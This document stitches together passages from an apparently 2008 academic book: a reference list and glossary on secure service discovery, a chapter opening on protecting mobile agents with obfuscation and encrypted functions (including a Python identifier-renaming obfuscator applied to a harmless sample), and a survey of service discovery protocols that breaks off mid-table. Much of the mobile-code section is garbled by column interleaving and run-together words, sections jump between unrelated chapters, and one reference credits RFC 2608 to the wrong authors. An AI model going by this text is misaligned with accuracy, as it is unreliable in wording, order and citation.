Czerwinski, S., Zhao, B., Hodes, T., Joseph, A., & Katz, R. (1999). An architecture for a secure service discovery service. In Fifth Annual International Conference on Mobile Computing and Networks (MobiCom ’99) (pp. 24-35).

Ganu, S., Krishnakumar, A., & Krishnan, P. (2004). Infrastructure-based location estimation in WLAN networks. In IEEE Wireless Communications and Networking Conference (WCNC) (pp. 465-470).

Garlan, D., Siewiorek, D., Smailagic, A., & Steenkiste, P. (2002). Project Aura: Towards distraction-free pervasive computing. IEEE Pervasive Computing, 1(2), 22-31.

Goldberg, I., Gribble, S., Wagner, D., & Brewer, E. (1999). The Ninja jukebox. In Proceedings of the Second USENIX Symposium on Internet Technologies and Systems (USITS-99) (pp. 37-46).

Gribble, S., Welsh, M., Von Behren, R., Brewer, E., Culler, D., Borisov, N., et al. (1999). Service location protocol version 2 (RFC 2608). Retrieved from http://www.faqs.org/rfcs/rfc2608.html

He, R., Niu, J., Yuan, M., & Hu, J. (2004). A novel cloud-based trust model for pervasive computing. In The Fourth International Conference on Computer and Information Technology (CIT ’04) (pp. 693-700).

Hengartner, U., & Steenkiste, P. (2006). Avoiding privacy violations caused by context-sensitive services. In Proceedings of the Fourth Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2006) (pp. 222-233).

Hess, A., Jacobson, J., Mills, H., Wamsley, R., Seamons, K., & Smith, B. (2002). Advanced client/server authentication in TLS. In Network and Distributed System Security Symposium.

Joseph, A., Katz, R., Mao, Z., Ross, S., & Zhao, B. (2001). The Ninja architecture for robust Internet-scale systems and services. Computer Networks, 35(4), 473-497.

Kagal, L., Finin, T., & Joshi, A. (2001). Trust-based security in pervasive computing environments. IEEE Computer, 34(12), 154-157.

Kagal, L., Finin, T., Joshi, A., & Greenspan, S. (2006). Security and privacy challenges in open and dynamic environments. IEEE Computer, 39(6), 89-91.

Kagal, L., Korolev, V., Avancha, S., Joshi, A., Finin, T., & Yesha, Y. (2001). Highly adaptable infrastructure for service discovery and management in ubiquitous computing (Tech. Rep. No. TR CS-01-06). Baltimore: University of Maryland, Department of Computer Science and Electrical Engineering.

Kagal, L., Korolev, V., Chen, H., Joshi, A., & Finin, T. (2001). Project Centaurus: A framework for intelligent services in a mobile environment. In International Workshop of Smart Appliances and Wearable Computing, International Conference of Distributed Computing Systems (pp. 195-201).

Kindberg, T., & Fox, A. (2002). System software for ubiquitous computing. IEEE Pervasive Computing, 1(1), 70-81.

Kopp, H., Lucke, U., & Tavangarian, D. (2005). Security architecture for service-based mobile environment. In Proceedings of the Third IEEE Conference on Pervasive Computing and Communications Workshops (pp. 199-203).

Lee, C., & Helal, S. (2002). Protocols for service discovery in dynamic and mobile networks. International Journal of Computer Research, 11(1), 1-12.

Matsumiya, K., Tamaru, S., Suzuki, G., Nakazawa, J., Takashio, K., & Tokuda, H. (2004). Improving
security for ubiquitous campus applications. In Symposium on Applications and the Internet-Workshops (SAINT 2004) (pp. 417-422).

Microsoft Corporation. (2000). Universal plug and play device architecture, Version 1.0.

Miller, B., Nixon, T., Tai, C., & Wood, M. (2001). Home networking with universal plug and play. IEEE Communications Magazine, 39(12), 104-109.

Minami, K., & Kotz, D. (2005). Secure context-sensitive authorization. In Proceedings of the Third International Conference on Pervasive Computing and Communications Workshops (PerCom 2005) (pp. 257-268).

Nidd, M. (2001). Service discovery in DEAPspace. IEEE Personal Communications, 8(4), 39-45.

Pearson, S. (2005). How trusted computers can enhance privacy preserving mobile applications. In Proceedings of the Sixth International IEEE Symposium on a World of Wireless Mobile and Multimedia Networks (WoWMoM ’05) (pp. 609-613).

Robinson, P., Vogt, H., & Wagealla, W. (Eds.). (2005). Privacy, security and trust within the context of pervasive computing. Heidelberg, Germany: Springer-Verlag.

Saha, S., Chaudhuri, K., Sanghi, D., & Bhagwat, P. (2003). Location determination of a mobile device using IEEE 802.11b access point signals. In IEEE Wireless Communications and Networking Conference (WCNC) (pp. 1987-1992).

Satyanarayanan, M. (1996). Fundamental challenges in mobile computing. In Fifteenth ACM Symposium on Principles of Distributed Computing (pp. 1-7).

Seamons, K., Winslett, M., & Yu, T. (2001). Limiting the disclosure of access control policies during automated trust negotiation. In Network and Distributed System Security Symposium.

Shankar, N., & Arbaugh, W. (2002). On trust for ubiquitous computing. Workshop on Security in Ubiquitous Computing (UBICOMP 2002).

Sharmin, M., Ahmed, S., & Ahamed, S. (2006a). MARKS (middleware adaptability for resource discovery, knowledge usability, and self healing) in pervasive computing environments. In Third International Conference on Information Technology: New Generations (pp. 306-313).

Sharmin, M., Ahmed, S., & Ahamed, S. (2006b). An adaptive lightweight trust reliant secure resource discovery for pervasive computing environments. In Proceedings of the Fourth Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2006) (pp. 258-263).

Sharmin, M., Ahmed, S., & Ahamed, S. (2006c). SSRD+: A privacy-aware trust and security model for resource discovery in pervasive computing environment. In 30th Annual International Computer Software and Applications Conference (COMPSAC 2006) (pp. 67-70).

Smith, B., Seamons, K., & Jones, M. (2004). Responding to policies at runtime in TrustBuilder. In Fifth International Workshop on Policies for Distributed Systems and Networks (POLICY 2004).

Stajano, F. (2002). Security for ubiquitous computing. West Sussex, England: John Wiley and Sons.

Stajano, F., & Anderson, R. (2002). The resurrecting duckling: Security issues for ubiquitous computing. IEEE Computer, 35(4), 22-26.

Sun Microsystems. (2001). Jini™ technology core platform specification, version 1.2.

Thomas, R., & Sandhu, R. (2004). Models, protocols, and architectures for secure pervasive computing: Challenges and research directions. In Second IEEE International Conference on Pervasive Computing and Communications—Workshops (PerCom 2004) (pp. 164-168).

Tripathi, A., Ahmed, T., Kulkarni, D., Kumar, R., & Kashiramka, K. (2004). Context-based secure resource access in pervasive computing environments. In Second IEEE Annual Conference on Pervasive Computing and Communications—Workshops (p. 159).
Undercoffer, J., Perich, F., Cedilnik, A., Kagal, L., & Joshi, A. (2003). A secure infrastructure for service discovery and access in pervasive computing. Mobile Networks and Applications, 8(2), 113-125.

Want, R., & Pering, T. (2005). System challenges for ubiquitous and pervasive computing. In Twenty-seventh International Conference on Software Engineering (ICSE 2005) (pp. 9-14).

Weiser, M. (1991). The computer for the twenty-first century. Scientific American, 265(3), 94-104.

Weiser, M. (1993). Some computer science problems in ubiquitous computing. Communications of the ACM, 36(7), 75-84.

Winoto, W., Schwartz, E., Balakrishnan, H., & Lilley, J. (1999). The design and implementation of an intentional naming system. In 17th ACM Symposium on Operating Systems Principles (SOSP ’99) (pp. 186-201).

Winslett, M. (2003). An introduction to automated trust establishment. In First International Conference on Trust Management.

Wu, C., Fu, L., & Lian, F. (2004). WLAN location determination in e-home via support vector classification. In IEEE Conference on Networking, Sensing & Control (pp. 1026-1031).

Youssef, M., Agrawala, A., & Udaya, A. (2003). WLAN location determination via clustering and probability distributions. In Proceedings of the First Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2003) (pp. 143-150).

Yu, T., & Winslett, M. (2003). A unified scheme for resource protection in automated trust negotiation. In IEEE Symposium on Security and Privacy (pp. 110-122).

Zhu, F., Mutka, M., & Ni, L. (2002). Classification of service discovery in pervasive computing environments (Tech. Rep. No. MSU-CSE-02-24). East Lansing: Michigan State University.

Zhu, F., Mutka, M., & Ni, L. (2003). Splendor: A secure, private, and location-aware service discovery protocol supporting mobile services. In Proceedings of the First IEEE Conference on Pervasive Computing and Communications (PerCom 2003) (pp. 235-242).

Zhu, F., Mutka, M., & Ni, L. (2004). PrudentExposure: A private and user-centric service discovery protocol. In Proceedings of the Second IEEE Conference on Pervasive Computing and Communications (PerCom 2004) (pp. 329-340).

Zhu, F., Mutka, M., & Ni, L. (2005). Expose or not? A progressive exposure approach for service discovery in pervasive computing environments. In Proceedings of the Third IEEE Conference on Pervasive Computing and Communications (PerCom 2005) (pp. 225-234).

Zhu, F., Mutka, M., & Ni, L. (2006). A private, secure, and user-centric information exposure model for service discovery protocols. IEEE Transactions on Mobile Computing, 5(4), 418-429.

Zimmermann, P. (1995). PGP source code and internals. Cambridge, MA: MIT Press.

Key Terms

Context: Context is the location, time, and activity state of the user when performing a service-related operation such as discovery, advertisement, or invocation.

Federated Discovery: Federated discovery is a service discovery mechanism that incorporates two or more different service advertisement mechanisms.

Meta Discovery: Meta discovery is the discovery of a service discovery mechanism by using meta information about that mechanism (Buford, Brown et al., 2006).

Peer Trust: Peer trust is the degree to which a peer device is willing to disclose information or provide access to resources to another peer, and which may be determined by experience through earlier interactions, verifiable properties of each party, recommendations from trusted entities, and reputation in a community.

Pervasive Computing: Pervasive computing is the evolution of distributed computing in which networked computing devices are integrated throughout the personal and work environments in a connected way, also referred to as ubiquitous computing.

Secure Service Discovery: Secure service discovery is service discovery that enforces the privacy and security policies of the devices participating in the service location process.

Service Composition: Service composition is the ability to dynamically discover and combine component services to form new services.

Service Discovery: Service discovery occurs when device resources and functions are packaged as services, in a networked environment, and a device finds another device capable of offering a specific service or resource.




Chapter III
Security of Mobile Code
Zbigniew Kotulski
Polish Academy of Sciences, Warsaw, Poland
Warsaw University of Technology, Poland

Aneta Zwierko
Warsaw University of Technology, Poland

Abstract

The recent development in mobile technology (mobile phones, middleware, wireless networks, etc.) has created a need for new methods of protecting code transmitted through the network. The oldest and simplest mechanisms concentrate more on the integrity of the code itself and on the detection of unauthorized manipulation. The newer solutions secure not only the compiled program, but also the data that can be gathered during its “journey,” and even the execution state. Some other approaches are based on prevention rather than detection. In this chapter we present a new idea for securing mobile agents. The proposed method protects all components of an agent: the code, the data, and the execution state. The proposal is based on a zero-knowledge proof system and a secure secret sharing scheme, two powerful cryptographic primitives. Next, the chapter includes a security analysis of the new method and its comparison to other, currently more widespread solutions. Finally, we propose a new direction for securing mobile agents by strengthening the methods of protecting the integrity of mobile code with risk analysis and a reputation system that helps to avoid high-risk behavior.

IntroductIon fortelecommunicationnetworksor - asartificiali


telligence (AI)-based intrusion detection systems.
A software agent is a program that can exercise Agents are commonly divided into two types:
an individual’s or organization’s authority, work
autonomously toward a goal, and meet and interact • Stationary agents
with other agents (Jansen & Karygiannis, 1999). • Mobile agents
Agents can interact with each other to negotiate
contracts and services, participate in auctions, or The stationary agent resides at a single platform
barter. Multi-agent systems have sophisticated ap- (host), the mobile one can move among different
plications, for example, as management systems platforms (hosts) at different times.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security of Mobile Code

The mobile agent systems offer new possibili- • Weakly mobile: Only the code is migrating;
ties for the e-commerce applications: creating new no execution state is sent along with an agent
types of electronic ventures from e-shops and e- program
auctions to virtual enterprises and e-marketplaces. • Strong mobile: A running program is mov-
Utilizing the agent system helps to automate many ing to another execution location (along with
e-commerce tasks. Beyond simple information its particular state)
gathering tasks, mobile agents can take over all
tasks of commercial transactions, namely, price The protection of the integrity of the mobile
negotiation, contract signing, and delivery of agent is the most crucial requirement for the agent
(electronic) goods and services. Such systems are system. The agent’s code and internal data autono-
developed for diverse business areas, for example, mously migrate between hosts and can be easily
contract negotiations, service brokering, stock changed during the transmission or at a malicious
trading, and many others (Corradi, Cremonini, host site. A malicious platform may make subtle
Montanari, & Stefanelli, 1999; Jansen & Karygi- changesintheexecutionow fl oftheagent’scode;
annis, 1999; Kulesza & Kotulski, 2003). Mobile thus, the changes in the computed results are dif-
agents can also be utilized in code-on-demand ficulttodetect.Theagentcannotitselfpreventt
applications (Wang, Guan, & Chan, 2002). Mobile but different countermeasures can be utilized in
agent systems have advantages even over grid order to detect any manipulation made by an un-
computing environments: authorized party. They can be integrated directly
into the agent system, or only into the design of an
• Require less network bandwidth agent to extend the capabilities of the underlying
• Increase asynchrony among clients and serv- agent system. However, the balance between the
ers security level and solution implementation’s cost,
• Dynamically update server interfaces as well as performance impact, has to be preserved.
• Introduce concurrency Sometimes, some restrictions of agent’s mobility
may be necessary.
The benefits from utilizing the mobileAccountability agents is also essential for the proper
in various business areas are great. However, this functioning of the agent system and establishing
technology brings some serious security risks; trust between the parties. Even an authenticated
one of the most important is the possibility of agent is still able to exhibit malicious behavior to the
tampering with an agent. In mobile agent systems platform if such a behavior cannot later be detected
the agent’s code and internal data autonomously and proved. Accountability is usually realized by
migrate between hosts and can be easily changed maintaining an audit log of security-relevant events.
during the transmission or at a malicious host site. Those logs must be protected from unauthorized
The agent cannot itself prevent this, but different accessandmodification.Alsothenon-repudiability
countermeasures can be utilized in order to detect of logs is a huge concern. An important factor of
any manipulation made by an unauthorized party. accountability is authentication. Agents must be
They can be integrated directly into the agent sys- able to authenticate to platforms and other agents
tem, or only into the design of an agent to extend and vice versa. An agent may require different
the capabilities of the underlying agent system. degrees of authentication depending on the level
Several degrees of agent’s mobility exist, cor- of sensitivity of the data.
responding to possibilities of relocating code and The accountability requirement needs also to
state information, including the values of instance be balanced with an agent’s need for privacy. The
variables, the program counter, execution stack, platform may be able to keep the agent’s identity
and so forth. The mobile agent technologies can secret from other agents and still maintain a form
be divided in to two groups: of revocable anonymity where it can determine
the agent’s identity if necessary and legal. The


Security of Mobile Code

security policies of agent platforms and their audit- method to provide such an environment is special
ing requirements must be carefully balanced with tamper-resistant hardware, but the cost of such a
agent’s privacy requirements. solution is usually very high.
Threats to security generally fall into three main The second group of methods provides the
classes: (1) disclosure of information, (2) denial of agents’ manager with tools to detect that the agent’s
service, and (3) corruption of information (Jansen, dataorcodehasbeenmodified,oranagentwitha
1999). Threats in agent system can be categorized mechanism that prevents a successful, unauthor-
with regard to agents and platform relations (e.g., ized manipulation. In this chapter we concentrate
agent attacking an agent, etc.). Another taxonomy on the “built-in” solutions because they enable
of attacks in agent system was proposed in Man an agent to stay mobile in the strong sense and,
and Wei (2001). The article describes two main moreover, provide the agent with mechanisms to
categories of attacks: purposeful and frivolous. detect or prevent tampering. Detection means that
The first kind is carefully planned and thedesigned
technique is aimed at discovering unauthorized
andcanbefurtherclassifiedbythenature ofattackofthecodeorthestateinformation
modification
(read or non-read) and number of attackers (solo or Prevention means that the technique is aimed at
collaborative). During the second kind of attacks, preventing changes of the code and the state infor-
the attacker may not know the effect of his/her mation in any way. To be effective, detection tech-
actions or gain an advantage. These attacks can niques are more likely than prevention techniques
be random or total. Another category of attacks is to depend on legal or other social framework. The
connected with traffic analysis (Kulesza, - Kotulbetween detection and prevention can
distinction
ski, & Kulesza, 2006) or called blocking attacks be sometimes arbitrary, since prevention often
(when a malicious platform refuses to migrate the involves detection (Jansen, 2000).
agent), as described by Shao and Zhou (2006). In
this chapter we will focus on the threats from an
agent’s perspective. bAckground
Among the mentioned threats, the most impor-
tant are connected with the agent platform since Many authors proposed methods for protecting
themostdifficulttoensureistheagent’s code/
integrity state
of the mobile code. The most interesting
integrity. There are two main concepts for protect- of them are presented in this section.
ing mobile agent’s integrity:
time limited black-box security and
• Providing trusted environment for agent’s obfuscated code
execution
• Detection or prevention of tampering These methods are based on a black-box approach.
The main idea of the black-box is to generate ex-
Thefirstgroupofmethodsismoreconcentrated ecutable code from a given agent’s specification
on the whole agent system than on an agent in that cannot be attacked by read (disclosure) or
particular. These seem to be easier to design and modificationattacks.Anagentisconsideredtobe
implement but, as presented in Oppliger (2000), black-box if at any time the agent code cannot be
mostly lead to some problems. The assumption that attacked in the previous sense, and if only its input
an agent works only with a group of trusted hosts and output can be observed by the attacker. Since
makes the agent less mobile than it was previously it is not possible to implement it today, the relax-
assumed. Also an agent may need different levels ation of this notion was introduced Hohl (1998): it
of trust (some information should be revealed to is not assumed that the black-box protection holds
host while in another situation it should be kept forever, but only for a certain known time. Accord-
secret). Sometimes, it is not clear in advance that ingtothisdefinition,anagenthasthetime-limite
the current host can be considered as trusted. A black-box property if for a certain known time it

0
Security of Mobile Code

cannot be attacked in the aforementioned sense. Encrypted functions


The time limited black-boxfulfillstwoblack-box
properties for this limited time: The encrypted functions (EF) method is one step
forward in implementing the perfect black-box
• Codeanddataoftheagentspecification - security.can
It has been proposed initially by Sander
not be read and Tschudin (1998). Since then other similar
• Codeanddataoftheagentspecification - solutionscan
were introduced (Alves-Foss, Harrison,
notbemodified & Lee, 2004; Burmester, Chrissikopoulos, &
Kotzanikolaou, 2000) and the method is believed
This scheme will not protect any data that is to be one of the canonical solutions for preserving
added later, although the currently existing vari- agent’s integrity (Jansen, 2000; Oppliger, 2000).
ables will be changeable. Thus, it cannot protect the state of an agent, which can change between different hosts, or any data which the agent gathered.

In order to achieve the black-box property, several conversion algorithms were proposed. They are also called obfuscating or mess-up algorithms. These algorithms generate a new agent out of an original agent, which differs in code but produces the same results.

The code obfuscation methods make it more complicated to obtain the meaning from the code. To change program code into a less easily readable form, they have to work in an automatic and parametric manner. The additional parameters should make it possible that the same original program is transformed into different obfuscated programs. The difficulty is to transform the program in a way that the original (or a similar, easily understandable) program cannot be re-engineered automatically. Another problem is that it is quite difficult to measure the quality of obfuscation; this depends not only on the algorithm used, but on the ability of the re-engineering as well. Some practical methods of code obfuscation are described by Low (1998), and a general taxonomy was proposed by Collberg, Thomborson, and Low (1997).

Since an agent can become invalid before completing its computation, the obfuscated code is suitable for applications that do not convey information intended for long-lived concealment. Also, it is still possible for an attacker to read and manipulate data and code, but as the role of these elements cannot be determined, the results of this attack are random and have no meaning for the attacker.

The goal of the EF, according to Jansen (2000), is to determine a method which will enable the mobile code to safely compute cryptographic primitives, such as digital signatures, even though the code is executed in non-trusted computing environments and operates autonomously without interactions with the home platform. The approach is to enable the agent platform to execute a program implementing an encrypted function without being able to extract the original function. This approach requires differentiation between a function and a program that implements the function.

The EF system is described as follows by Oppliger (2000):

A has an algorithm to compute function f. B has an input x and is willing to compute f(x) for A, but A wants B to learn nothing substantial about f. Moreover, B should not need to interact with A during the computation of f(x).

The function f can be, for example, a signature algorithm with an embedded key or an encryption algorithm containing one. This would enable the agent to sign or encrypt data at the host without revealing its secret key.

Although the idea is straightforward, it is hard to find appropriate encryption schemes that can transform arbitrary functions as shown. So far, techniques to encrypt rational functions and polynomials have been proposed. Also a solution based on the RSA cryptosystem was described (Burmester et al., 2000).
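The parametric, behaviour-preserving transformation described above (one original program, a parameter that yields a different but functionally identical program on every run) can be tried on a small scale. The following is an added example and is not code from this chapter or from any of the cited obfuscators: it rewrites the abstract syntax tree of a constructed sample routine, renaming identifiers from a seeded random source and wrapping every statement in an opaque predicate that is always true. The seed is the obfuscation parameter; the sample routine, the alias alphabet and the predicate form are my own choices.

```python
import ast
import random

# Constructed sample "agent" routine (not from the chapter). It sums the
# gathered values that exceed a threshold; this is the program we obfuscate.
AGENT_SOURCE = """
def gather(values, threshold):
    total = 0
    for v in values:
        if v > threshold:
            total = total + v
    return total
"""


class ParametricObfuscator(ast.NodeTransformer):
    """Behaviour-preserving, seed-parameterised transformation.

    Two transformations are applied:
      1. every function name, parameter and local variable is replaced by a
         hard-to-read alias drawn from a seeded random source;
      2. every statement in a function body is wrapped in an opaque
         predicate, (k*k) % 4 in (0, 1), which holds for every integer k
         but forces a reverse engineer to prove that before dropping it.
    Different seeds yield different programs with identical behaviour.
    """

    ALPHABET = "lI1O0"  # visually confusable characters for aliases

    def __init__(self, seed):
        self.rng = random.Random(seed)
        self.aliases = {}  # original identifier -> alias

    def alias(self, name):
        if name not in self.aliases:
            while True:
                candidate = "_" + "".join(self.rng.choice(self.ALPHABET) for _ in range(8))
                if candidate not in self.aliases.values():
                    break
            self.aliases[name] = candidate
        return self.aliases[name]

    def visit_FunctionDef(self, node):
        node.name = self.alias(node.name)
        for arg in node.args.args:
            arg.arg = self.alias(arg.arg)
        self.generic_visit(node)  # renames identifiers inside the body
        wrapped = []
        for stmt in node.body:
            k = self.rng.randint(2, 10_000)
            test = ast.parse(f"({k} * {k}) % 4 in (0, 1)", mode="eval").body
            dead = ast.parse("raise RuntimeError('unreachable')").body
            wrapped.append(ast.If(test=test, body=[stmt], orelse=dead))
        node.body = wrapped
        return node

    def visit_Name(self, node):
        # Assignment targets introduce locals; loads are renamed only if the
        # identifier is one we have already seen, so builtins stay untouched.
        if isinstance(node.ctx, ast.Store) or node.id in self.aliases:
            node.id = self.alias(node.id)
        return node


def obfuscate(source, seed):
    """Return (obfuscated_source, alias_map) for the given seed."""
    tree = ast.parse(source)
    transformer = ParametricObfuscator(seed)
    tree = ast.fix_missing_locations(transformer.visit(tree))
    return ast.unparse(tree), dict(transformer.aliases)


def run(source, function_name, *args):
    """Execute a program text in a fresh namespace and call one function."""
    namespace = {}
    exec(compile(source, "<agent>", "exec"), namespace)
    return namespace[function_name](*args)


def same_behaviour(source, seed, *args):
    """True if the obfuscated program computes what the original computes
    (the sample routine is called 'gather' in the original)."""
    obf_source, aliases = obfuscate(source, seed)
    return run(obf_source, aliases["gather"], *args) == run(source, "gather", *args)


if __name__ == "__main__":
    for seed in (1, 2):
        text, names = obfuscate(AGENT_SOURCE, seed)
        print(f"--- seed {seed}: gather -> {names['gather']}")
        print(text)
```

Renaming alone is weak (a decompiler recovers structure regardless of names), and a constant opaque predicate falls to constant folding; the example is meant to show the shape of the transformation, not a strong obfuscator. Measuring quality, as the text notes, would mean measuring how much effort a re-engineering tool needs to undo exactly these steps.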


Secure Service Discovery

mobile devices, but also for sharing of resources between devices. There are four elements found in the service-oriented approach: (1) service description, which provides an interchangeable way for devices to describe the service and its use; (2) service registration or advertisement on behalf of the service provider; (3) service discovery by devices seeking a service; and (4) service invocation, which is a protocol by which a service requester and service provider coordinate to deliver a service. Propagation of service advertisements can use pull (query), push (announcement), or a combination of pull and push. In addition, the ability to dynamically discover and combine component services to form new services is referred to as service composition.

Broadband wireless technologies such as WiMax, UWB, and 802.11n are bringing broadband connectivity to mobile CE devices. These devices will be able to switch between different network access technologies. This has the following consequences for service discovery in pervasive computing:

• Due to broadband connectivity, devices will be able to participate in media-rich and sophisticated resource sharing.
• Wide-area service discovery and location-based discovery will grow in importance due to the combination of increased connectivity and wide-area roaming.
• The ability to act as multi-homed devices means that devices will have increased connectivity but also an increased rate of transitions due to roaming between different networks.
• Devices will be able to simultaneously participate in a personal area network (PAN), home networks, and wireless area networks (WANs) with different security and trust properties. In PANs and home networks, mediation of service discovery between networks is needed, in which devices such as gateways proxy or intermediate service discovery between network domains.
• Device-to-device interaction will grow in importance to users for applications such as content sharing, communication, and gaming.

Due to these trends, richer models of discovery are being considered, such as federated discovery, meta discovery, and semantic discovery (Buford, Brown, & Kolberg, 2006; Buford, Celebi, & Frankl, 2006).

Consequently, it is important for wireless devices to securely participate in service discovery with other devices that are outside the immediate administrative security domain. Further, these devices interact with other devices in an ad hoc [...] leads to the dependency on other devices for resources. The nature of devices, communication patterns, and dependency on other devices in turn causes security vulnerabilities. Due to the ad hoc connectivity and dynamic nature of the population [...] intermittent and short-lived. Moreover, multiple devices [...] responsive service discovery model.

Thus far, we have discussed the general view of and motivation for service discovery for mobile devices. The rest of the chapter is organized as follows: The next section summarizes the security goals for service discovery and presents a model for service discovery in pervasive computing. The third section surveys present unsecured service discovery models. The fourth section surveys existing secure service discovery models, organized into three different categories. Two case studies of service discovery protocols that incorporate trust-based mechanisms are described in the [...] sections summarize important research issues and conclusions.

[...] discovery is well established (Matsumiya et al., 2004; Stajano, 2002; Stajano & Anderson, 2002). Privacy, security, and trust issues in service discovery in the pervasive computing area are of utmost importance (Robinson et al., 2005). Thus, the service discovery process demands models that ensure the privacy and security of the user. In particular, this privacy and security should encompass:

• Authentication: Do the user and device actually have the indicated identity?
• Authorization: Does the user have access rights for issuing service advertisements, requesting services, and invoking services?
• Trust: Are the participating user and device trusted? Are the service and its components trusted?
• Privacy: Is only the approved information shared between the given users/devices during service discovery, advertisement, and invocation (SDAI) operations? Is disclosure to unauthorized users prevented?
• Vulnerability to attack and misuse: Are the SDAI operations protected from attacks such as denial-of-service, spoofing, replay, and man-in-the-middle? Are the SDAI operations protected from misuse in enabling such attacks on other network components?

An important question is what security, privacy, and trust mechanisms are provided by the wireless network. IEEE 802.11i, certified by the Wi-Fi Alliance as WiFi Protected Access 2 (WPA2), replaced Wired Equivalent Privacy (WEP) with stronger encryption (AES-CCMP) and a new authentication mechanism (IEEE 802.1X/EAP) that, in its enterprise mode, incorporates an authentication server such as a remote authentication dial-in user service (RADIUS) server. This mechanism, while suitable for enterprise deployment, has had limited use in home networks because of complex administration, and in public hot spots due to the difficulty of administering shared keys. Thus, in the best case, a set of devices is authenticated in a single administrative domain, and the authentication server can be used to support authorization policies, including policies related to service discovery and use. Network packets between authenticated users are encrypted, providing communication privacy from non-authenticated parties. Note that this protection is at the link layer, between a station and its access point: it says nothing about which services a device may advertise or invoke. These security capabilities therefore cover only a subset of the aforementioned security goals and are limited to single administrative domains. For interactions crossing administrative boundaries, or without infrastructure support, other mechanisms are needed.

Further, traditional security mechanisms do not work well in this environment because the devices are computationally limited and the notion of physical security is not applicable (Kagal, Finin, & Joshi, 2001). Then, considering the choices of totally sacrificing security versus imposing a full-fledged security structure similar to desktops and laptops, the question is whether there is any middle ground. Ensuring varying levels of security for various services is a research challenge. The insufficiency of user/device identity for trust is another concern in designing a discovery model, and techniques for peer trust and risk assessment (Chen, Jensen, Gray, Cahill, & Seigneur, 2003) are important tools to address this.

Desired characteristics of a secure and private service discovery model are summarized next.

• Adaptive: The trust value and security level should be adaptable depending on the service itself, the service provider, and the service requester.
• Trust reliant: The model should consider trust relationships among devices. Where no prior information is available, reputation, recommendation, or trust negotiation schemes can be used. If these are unsuitable, then risk assessment can be used.
• Infrastructure independence: No infrastructure support (e.g., powerful servers, proxies) should be required. The model should work independently without any external support, but be able to leverage infrastructure where it exists.
• Lightweight: The model should be lightweight in terms of executable file size.
• Service oriented: To control service security modularly, service discovery models should be service oriented.
• Graceful performance degradation: The model should not put much overhead on the performance of the device, and performance should degrade gracefully for more advanced security features.



• Energy efficient: Service discovery models should be energy conserving, for example, avoiding continuous broadcasting or polling.

A classification and detailed survey of service discovery models can be found in Zhu, Mutka, and Ni (2002). Service-oriented architectures (SOA) and their security are discussed in Cotroneo, Graziano, and Russo (2004). We classify existing service discovery models into two broad categories. First are service discovery models that do not address security issues (Balazinska, Balakrishnan, & Karger, 2002; Microsoft, 2000; Miller, Nixon, Tai, & Wood, 2001; Nidd, 2001; Winoto, Schwartz, Balakrishnan, & Lilley, 1999). Second, there are models that consider a full-fledged security mechanism with the help of infrastructure support (Czerwinski, Zhao, Hodes, Joseph, & Katz, 1999; Zhu, Mutka, & Ni, 2003, 2004). The next two sections discuss examples of these cases, and Table 1 compares the key features of the surveyed systems.

SERVICE DISCOVERY MODELS WITHOUT INHERENT SECURITY

We describe several designs that do not address security requirements. Nevertheless these models are important either because the systems are widely used, are representative approaches, or could be secured by additional mechanisms in a secure network. The designs we discuss are Bluetooth, DEAPSpace, and Intentional Naming System (INS).

Bluetooth service discovery (Bluetooth Special Interest Group [SIG], 2001a, 2001b), the Service Discovery Protocol (SDP), is a pull protocol. Device information, services, and the characteristics of the services are queried, and connections between two or more Bluetooth devices are established. This facilitates user selection, scope-awareness, and both unicast and broadcast communication. A Bluetooth device returns all matched resource information.

Nidd (2001) developed the DEAPSpace service discovery method for ad hoc and mobile device applications. Each node broadcasts its advertisement of local services. After receiving a broadcast, each node updates its service list with information about the other nodes' services. This service information is included in that node's subsequent broadcast. Each node is a broadcaster, and DEAPSpace uses contention timers at each node so that a node will randomly delay its broadcast after another broadcast is received. DEAPSpace can reduce service discovery time at the cost of increased bandwidth and power consumption.

INS (Winoto et al., 1999) supports both pull and push delivery of service advertisements. It also supports unicast, anycast, and broadcast methods. It offers the best-match resource information and also provides facilities for limited support of context information. In INS each device asks a central name resolver for the type of service it requires, and the resolver replies with the best matched device address.

SECURE SERVICE DISCOVERY MODELS

Most contemporary service discovery models fall into this category. Some models include full-fledged security mechanisms, while others rely on simple algorithms for limited security. This category can be subdivided into infrastructure-based, infrastructure-less, hardware-based, and smart-space-oriented security mechanisms. In the following subsections we discuss each of these categories.

Infrastructure-Based Security

UPnP is a specification for connecting multiple devices on a home network so that these devices can invoke each other's services. UPnP defines a set of protocols and a service description format. In addition, UPnP standardizes various service interfaces. UPnP relies on an administratively scoped multicast IP address for service discovery, service advertisement, and event delivery; discovery and advertisement use the simple service discovery protocol (SSDP) on 239.255.255.250, UDP port 1900. Each UPnP device multicasts its advertisements when it connects to the network. Thereafter, a UPnP device sends advertisements in response to queries from other devices. These queries may be for all services on the network or for a specific service on the network. The UPnP Device Security specification defines security mechanisms for simple object access protocol (SOAP)-based service invocation, but does not address SSDP security; advertisements and search responses are therefore unauthenticated and can be forged by any host on the local link.

Table 1. Comparison of secure service discovery models: SSDS (Czerwinski et al., 1999), Ninja (Goldberg, Gribble, Wagner, & Brewer, 1999; Gribble et al., 2001), UPnP (Miller et al., 2001), SPDP (Almenarez & Campo, 2003), Progressive Exposure (Zhu et al., 2004; Zhu, Mutka, & Ni, 2006), Splendor (Zhu et al., 2003), Jini (Sun Microsystems, 2001), CSAS (Minami & Kotz, 2005), CSM (Brezillon & Mostefaoui, 2004), AVCM (Shankar & Arbaugh, 2002), CSRA (Tripathi, Ahmed, Kulkarni, Kumar, & Kashiramka, 2004), TRAC (Basu & Callaghan, 2005), SME (Kopp, Lucke, & Tavangarian, 2005), HCA (Pearson, 2005), SSRD (Sharmin, Ahmed, & Ahamed, 2006a), SSRD+ (Sharmin, Ahmed, & Ahamed, 2006b), Centaurus (Kagal, Korolev, Chen, Joshi, & Finin, 2001), Centaurus2 (Undercoffer, Perich, Cedilnik, Kagal, & Joshi, 2003), SLP (Barbeau, 1999; Guttman, Perkins, Veizades, & Day, 1999), Sleeper (Buford, Celebi, et al., 2006)

Model                  Adaptive  Infrastructure   Lightweight  Smart space  Service-  Trust    Privacy  Context
                                 support needed                needed       oriented  aware    aware    aware
SSDS                   No        Yes              No           No           N/A       N/A      N/A      No
Ninja                  No        Yes              No           No           N/A       N/A      N/A      No
UPnP                   No        N/A              No           No           No        Yes      No       Limited
